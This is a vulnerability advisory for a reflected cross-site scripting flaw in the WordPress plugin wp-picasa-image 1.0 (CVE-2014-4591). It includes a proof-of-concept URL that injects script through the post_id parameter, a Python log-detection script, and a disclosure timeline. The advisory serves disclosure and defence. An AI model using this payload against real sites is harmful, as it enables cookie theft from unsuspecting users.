wp-plugin : wp-picasa-image – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-picasa-image

 

Affected Version : 1.0 (and most probably lower versions, if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/wp-picasa-image/picasa_upload.php?post_id=%27%26type%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26

Vulnerable Parameter : post_id
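
A log check for this issue, as an added example that is not part of the original advisory: it flags requests to picasa_upload.php whose decoded post_id is not a plain number. The log lines are constructed (the second embeds the PoC URL above), and treating legitimate post_id values as numeric WordPress post IDs is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format). The second request is the
# PoC URL from this advisory; the other two are made-up benign traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Jun/2014:10:00:01 +0000] "GET /wp-content/plugins/wp-picasa-image/picasa_upload.php?post_id=42 HTTP/1.1" 200 512
192.0.2.11 - - [12/Jun/2014:10:00:05 +0000] "GET /wp-content/plugins/wp-picasa-image/picasa_upload.php?post_id=%27%26type%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 HTTP/1.1" 200 640
192.0.2.12 - - [12/Jun/2014:10:00:09 +0000] "GET /index.php?post_id=7 HTTP/1.1" 200 2048
"""

# Captures the client address and the request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ENDPOINT = "/wp-content/plugins/wp-picasa-image/picasa_upload.php"
# Assumption: a legitimate post_id is an ASCII decimal number.
NUMERIC_ID = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return (client, decoded post_id) pairs for requests to the plugin
    endpoint whose post_id is not a plain decimal number."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes each value; blank values are kept so that
        # an empty "post_id=" is reported as well.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("post_id", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric post_id: {value!r}")
```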

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Closed
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4591

 
Plugin Description :
 
You just need to copy the address of the pictures from Picasa album, then this plugin will help you modify the address to show in your posts. If the address of picture is not from Picasa, it won't do anything.
The plugin has been embedded into backstage editor, so you don't need to modify the theme files.

If you find any problem, please let me know.
